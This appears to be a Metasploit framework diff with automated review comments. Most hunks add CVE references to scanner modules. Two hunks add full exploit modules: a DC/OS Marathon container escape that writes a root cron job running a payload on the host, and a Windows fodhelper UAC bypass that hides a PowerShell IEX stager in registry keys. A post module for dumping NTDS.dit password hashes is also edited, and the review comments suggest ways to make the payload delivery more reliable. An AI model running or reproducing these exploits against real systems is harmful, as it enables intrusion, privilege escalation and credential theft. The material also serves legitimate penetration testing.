['URL', 'https://www.owasp.org/index.php/Cross_Site_Tracing']
]
)
end

View File

@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4782'],
['URL', 'http://fish2.com/ipmi/cipherzero.html'],
['OSVDB', '93038'],
['OSVDB', '93039'],

View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0659' ],
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],

View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

View File

@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
[ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ]
]
)
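Review bot: CVE-2013-5211 covers the `monlist` amplification in ntpd (the `# see also scanner/ntp/ntp_monlist.rb` comment points at exactly that), whereas the existing reference on the next line, `ntp-clock-variables-disclosure`, describes a different issue: `readvar` information disclosure. Attaching the monlist CVE here will mislabel every readvar finding; keep the CVE on the monlist modules only.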

View File

@ -25,6 +25,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

View File

@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

View File

@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => 'Jon Hart <jon_hart[at]rapid7.com>',
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'],
['URL', 'http://r-7.co/R7-2014-12']
],

View File

@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Author' => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]
'References' =>
[
[ 'CVE', '2012-1675'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ],
],
'DisclosureDate' => 'Apr 18 2012',

View File

@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'],
['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/']
],
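Review bot: CVE-2013-5211 is the ntpd `monlist` amplification CVE, but the existing reference on the following line is the Level 3 portmapper reflection write-up, so this module is not an NTP scanner and the CVE does not apply to it. The `# see also scanner/ntp/ntp_monlist.rb` comment suggests the line was copied across the amplification modules wholesale; each module should carry the CVE for its own protocol (or none), not the NTP one.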

View File

@ -35,6 +35,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9361'],
[ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],
[ 'URL', 'http://www.moxa.com/support/faq/faq_detail.aspx?id=646' ],
]

View File

@ -16,6 +16,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A']
]
)

View File

@ -21,7 +21,12 @@ class MetasploitModule < Msf::Auxiliary
),
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
'DisclosureDate' => 'Mar 15 2014',
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '0000-0000'], # remove or update if CVE exists
['URL', 'https://SomeURLinCyberspace.local']
]
)
)
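Review bot: `['CVE', '0000-0000']` in the example module template is a well-formed but non-existent CVE, and any tool that harvests references across `modules/` will treat it as real. Since the comment already says "remove or update", prefer commenting the whole line out (`# ['CVE', 'YYYY-NNNN'],`) so a copy-paste from the template cannot ship a bogus reference.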

View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A']
],
)

View File

@ -13,7 +13,14 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'UPnP SSDP M-SEARCH Information Discovery',
'Description' => 'Discover information from UPnP-enabled systems',
'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5958'],
['CVE', '2012-5959'],
['CVE', '2013-0230'],
['CVE', '2013-0229']
]
)
register_options( [

View File

@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary
'Description' => 'Detect VNC servers that support the "None" authentication method.',
'References' =>
[
['CVE', '2006-2369'], # a related instance where "None" could be offered and used when not configured as allowed.
['URL', 'http://en.wikipedia.org/wiki/RFB'],
['URL', 'http://en.wikipedia.org/wiki/Vnc'],
],

View File

@ -0,0 +1,195 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'DC/OS Marathon UI Docker Exploit',
'Description' => %q{
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS cluster.
},
'Author' => 'Erik Daguerre',
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
],
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}
]
],
'DefaultOptions' => { 'WfsDelay' => 75 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 03, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
])
end
def get_apps
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
return unless res and res.code == 200
# verify it is marathon ui, and is returning content-type json
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
apps = JSON.parse(res.body)
apps
end
def del_container(container_id)
res = send_request_raw({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, container_id)
})
return unless res and res.code == 200
res.code
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
payload_data = nil
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
command << "echo \"\" >> #{echo_cron_path}\n"
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
command << "sleep 120"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
container_data = {
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
'cpus' => 1,
'mem' => 128,
'disk' => 0,
'instances' => 1,
'id' => container_id,
'container' => {
'docker' => {
'image' => datastore['DOCKERIMAGE'],
'network' => 'HOST',
},
'type' => 'DOCKER',
'volumes' => [
{
'hostPath' => '/',
'containerPath' => mnt_path,
'mode' => 'RW'
}
],
},
'env' => {},
'labels' => {}
}
container_data
end
def check
return Exploit::CheckCode::Safe if get_apps.nil?
Exploit::CheckCode::Appears
end
def exploit
if get_apps.nil?
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id()
res = send_request_raw({
'method' => 'POST',
'uri' => target_uri.path,
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
})
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
print_status('The docker container is created, waiting for it to deploy')
register_files_for_cleanup(cron_path, payload_path)
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
deleted_container = false
print_status("Waiting up to #{wait_time} seconds for docker container to start")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
apps_status = get_apps
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
apps_status['apps'].each do |app|
next if app['id'] != "/#{container_id}"
if app['tasksRunning'] == 1
print_status('The docker container is running, removing it')
del_container(container_id)
deleted_container = true
wait_time = 0
else
vprint_status('The docker container is not yet running')
end
break
end
end
# If the docker container does not deploy remove it and fail out.
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
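Review bot: `make_cmd` drops `payload.raw` straight into a double-quoted shell string (`command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"`), so any `"`, `$` or backtick in the generated Python payload is interpreted by the container's shell and corrupts the file that cron later runs; writing the payload base64-encoded and decoding it on the target (`echo <b64> | base64 -d > path`) would make this robust. Two smaller points: `check` maps a nil from `get_apps` to `CheckCode::Safe`, but nil also covers a plain connection failure, so `Unknown` (or `Detected` when the endpoint answers, since nothing version-specific is checked) would be more honest; and the `fail_with(Failure::Unknown, 'No apps returned')` inside the wait loop aborts without calling `del_container`, leaving the host-root-mounted container deployed, whereas the `unless deleted_container` branch just below it does clean up.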

@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2014-5470'],
['EDB', '34450'],
['OSVDB', '110601']
],

@ -0,0 +1,209 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
CMD_MAX_LEN = 16383
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
'Description' => %q{
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
},
'License' => MSF_LICENSE,
'Author' => [
'winscriptingblog', # UAC bypass discovery and research
'amaloteaux', # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
]
],
'DisclosureDate' => 'May 12 2017'
)
)
end
def check
if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
commspec = '%COMSPEC%'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] == ARCH_X64
if session.arch == ARCH_X86
# fodhelper.exe is x64 only exe
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
if target_arch.first == ARCH_X64
# We can't use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = "powershell.exe"
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
end
psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
if existing.empty?
registry_createkey(FODHELPER_WRITE_KEY, registry_view)
end
print_status("Configuring payload and stager registry keys ...")
unless exist_delegate
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
end
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path("/c #{FODHELPER_PATH}")
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(5)
handler(client)
print_status("Cleaining up registry keys ...")
unless exist_delegate
registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(FODHELPER_DEL_KEY, registry_view)
else
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
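Review bot: the `'References'` entry is malformed: both URLs sit inside one inner array (`[ 'URL', 'https://winscripting.blog/...', 'URL', 'https://github.com/...' ]`), so the framework sees a single four-element reference rather than two `['URL', ...]` pairs; split them. In `check_permissions!`, `is_in_admin_group?` is called twice and the `fail_with(Failure::NoAccess, ...) unless is_in_admin_group?` line makes the later `admin_group.nil?` branch (the "whoami is not there" fallback) unreachable, since a nil result already aborts; keep one call and one decision. The cleanup also keys on `existing.empty?` to decide `registry_deletekey(FODHELPER_DEL_KEY, ...)`, which removes the whole `HKCU\Software\Classes\ms-settings` tree even when that key already existed with an empty or absent `(Default)`; tracking whether the key itself was created would be safer. Minor: the oversized-payload check uses `Failure::None` where `Failure::BadConfig` fits, and the user-facing strings carry typos ("smaller then", "copule", "Cleaining").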

@ -8,7 +8,7 @@ require 'ruby_smb/smb1/packet'
require 'windows_error'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
@ -32,6 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
The module will attempt to use Anonymous login, by default, to authenticate to perform the
exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use
those instead.
On some systems, this module may cause system instability and crashes, such as a BSOD or
a reboot. This may be more likely with some payloads.
},
'Author' => [

@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
module MetasploitModule
CachedSize = 71
CachedSize = 99
include Msf::Payload::Stager
include Msf::Payload::Linux::ReverseTcp
@ -18,7 +18,7 @@ module MetasploitModule
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [ 'skape', 'egypt' ],
'Author' => [ 'skape', 'egypt', 'tkmru' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,

@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp'
module MetasploitModule
CachedSize = 114
CachedSize = 142
include Msf::Payload::Stager
include Msf::Payload::Linux::ReverseTcp

@ -8,7 +8,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl'
module MetasploitModule
CachedSize = 378
CachedSize = 470
include Msf::Payload::Stager
include Msf::Payload::Python::ReverseTcpSsl

@ -33,10 +33,13 @@ class MetasploitModule < Msf::Post
if preconditions_met?
ntds_file = copy_database_file
unless ntds_file.nil?
file_stat = client.fs.file.stat(ntds_file)
print_status "NTDS File Size: #{file_stat.size.to_s} bytes"
print_status "Repairing NTDS database after copy..."
print_status repair_ntds(ntds_file)
realm = sysinfo["Domain"]
ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
print_status "Started up NTDS channel. Preparing to stream results..."
ntds_parser.each_account do |ad_account|
print_good ad_account.to_s
report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
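Review bot: style point on the new size line: `#{file_stat.size.to_s}` does not need the `.to_s` inside string interpolation, `#{file_stat.size}` is enough.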
@ -46,6 +49,7 @@ class MetasploitModule < Msf::Post
report_hash(hash_string.downcase,ad_account.name, realm)
end
end
print_status "Deleting backup of NTDS.dit at #{ntds_file}"
rm_f(ntds_file)
end
end
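Review bot: the new "Deleting backup of NTDS.dit" message and the `rm_f(ntds_file)` after it only run when `each_account` completes; if the parser raises or the session drops mid-stream, the copied database stays on the domain controller. Wrapping the parse in `begin ... ensure rm_f(ntds_file) end`, or calling `register_file_for_cleanup(ntds_file)` right after `copy_database_file` returns, would make the cleanup unconditional.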